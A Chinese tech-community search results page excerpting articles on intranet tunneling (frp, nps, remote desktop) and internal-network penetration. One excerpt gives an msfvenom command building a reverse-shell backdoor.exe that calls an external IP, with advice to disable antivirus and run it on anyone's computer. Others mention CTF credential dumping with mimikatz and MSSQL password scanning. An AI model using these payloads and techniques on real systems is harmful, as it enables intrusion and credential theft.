首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    内网接收外网shell(内网穿透)

    前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。...工具: 我们到官网上下载就好了: https://github.com/fatedier/frp/releases 我这里下载的是最新版,当然我们还需要准备一台服务器,腾讯云什么就好 轻量级就可以了,...(这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp...LHOST=101.43.1.181 LPORT=8000 -f exe -o backdoor.exe -o选择文件名,ip地址选择外网服务器的地址 端口选择8000 下载到桌面 我这里用xshell...windows/meterpreter/reverse_tcp 设置IP和端口 然后我们生成就好,放到任意谁的电脑上,但是要关杀软,因为我们没加免杀,Windows自带的检测也要关闭 运行后成功外网上线

    1.4K20

    外网打点到内网横向

    - 弱鸡 (ruoji.info) 第一个flag–外网打点 第一个flag就是签到题,当时图忘记留了,就是直接就给出flag了 图片 图片 Z-BlogPHP 1.7.2CMS,后台路径是zb_system...c8aZaU CS简单做个免杀套个壳改一下特征码即可实现绕火绒,上传上去之后cs上线 这地方到后面几天,免杀也不行了,虽说上传上去了但是运行不上线,用powershell进行上线 上传fscan进行内网探测...#外网对应内网地址 [+] SSH:192.168.1.129:22:root root #蜜罐 192.168.243.135:3306 open 192.168.243.135:135 open...129几乎全是蜜罐 第三个flag-内网横向 cs上线 图片 抓取密码 -logonpasswords Authentication Id : 0 ; 506030 (00000000:0007b8ae...) kerberos : Username : desktop-48iqavs$ Domain : WORKGROUP Password : (null) ssp : KO credman : 内网横向探测

    1.2K30

    FRP内网穿透单机传奇架设外网

    看着这个标题我我自己都有点懵,大概意思就是用自己家的电脑架设一个传奇服务端,然后用FRP内网穿透可以在外网玩,标题写的有点纠结,就这样吧。...请先准备工具: 1.电脑(能上网的那种); 2.服务器1台(自己玩1M宽带即可,很多人玩就自己看着办); 3.一个支持frp内网穿透的路由器(好像有软件也可以支持,没试过); 4.好像没了(一个脑子༼...∗ •̀ (oo) •́ ∗ ༽) 开始搞事情 先在服务器上面安装frp内网穿透:Frp内网穿透Frp一键安装脚本及设置教程 然后就在路由器设置和服务器没啥太大的关系了。...爱游这里配置了所有端口,就是测试的时候配置的,事实证明并不需要,只需要7000,7100,7200端口 还有就是要在基本设置里面设置成外网的IP地址,不然是不开门的。 ?...下面是在外网访问的效果:(图片大让它加载一会会儿) ?

    4.3K30

    内网外网MSSQL口令扫描渗透

    在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透...本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。...Passwordlist根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。...XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。...图16成功登录远程终端 4.总结与提高 (1)口令扫描,可以通过sqlping等工具内网IP进行扫描,获取sa口令 (2)查看服务器版本,对SQLServer2005可恢复其存储进程:EXEC sp_configure

    2.4K60

    nps内网穿透实现外网访问树莓派

    今天先说一下最重要的问题:如何通过内外穿透让外网访问到树莓派上的服务? 从网站建好以后,试过两种内网穿透方式,花生壳、NPS。...目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p...但nps有个最大的问题就是:需要一台外网能访问到的服务器来架设nps服务。有人说你都有外网的服务器了还要内网穿透干什么呢?...在我看来,坚持使用nps的理由是这样,nps轻量级,高性能,但其本身负责的是流量转发功能,我们可以在内网服务器进行更密集、高负荷的运算,而承担nps服务的外网服务器的配置要求就低很多。...ssh连接 当然我的网站其实是放在外网服务器的,示例的网站只是自己有个域名随便玩的。最主要的用处是能够随时随地通过ssh控制家里的树莓派。

    1.6K20

    远程桌面链接内网服务器(外网内网)详细介绍

    一般有几种方法: 1.windows远程桌面到公司电脑 2.笔记本链接至V**服务器,公司电脑也链接到V**服务器,然后公司电脑把3389端口映射出来,然后家里电脑直接通过远程桌面工具访问公司电脑...3.可以通过第三方工具比如teamview远程,但是现在不能用了。...你可以理解为这个花生壳就是一个V** 5.链接成功以后可以开个测试工具测试下端口是否映射成功(我这里是开了个微服务项目测试的) 6.需要到主机的计算机管理-本地用户组当中的用户设置密码(如果需要的话)...,在公司里,因为内网地址可能被域名绑定,因此不需要考虑地址是否在公网上。...以下是实践操作中查阅的相关资料文档: 外网远程桌面连接内网服务器(https://blog.csdn.net/u010169742/article/details/77993022) win7 不设置用户名密码远程登录方法

    9.9K40

    外网内网的渗透姿势分享

    渗透的大体过程 整个渗透测试的流程就是通过信息收,集到外网的 web 漏洞挖掘,来获取一个 webshell ,通过这个 shell 进一步利用来打进内网,进行内网渗透、域渗透,最终获取域控权限的一个过程...内网数据库爆破 这里推荐使用 F-Scrack 和 DBScanner 工具,在 github 上面都有,进入内网之后弱口令比较多,扫描爆破的效果还是不错的。...从 S2-045 到内网渗透 检测 S2 的方法就不说了,直接工具一把梭。这里推荐使用 "Struts2漏洞检查工具2018版" 这个工具,可以批量导入 url ,效率还是可以的。...第二种方法可以用上面那个工具进行文件上传传小马上去,接着用小马客户端传大马就行了,这是常规套路。 ? Q:拿到大马之后要干啥? A:当然要进一步渗透了,内网渗透、域渗透。...所以这时候你一般就没有办法直接连接到他的 3389 端口,因为他在内网里所以就只能使用端口转发了。 如果存在外网 IP 的话显示的就是外网 IP。

    2.2K30
    领券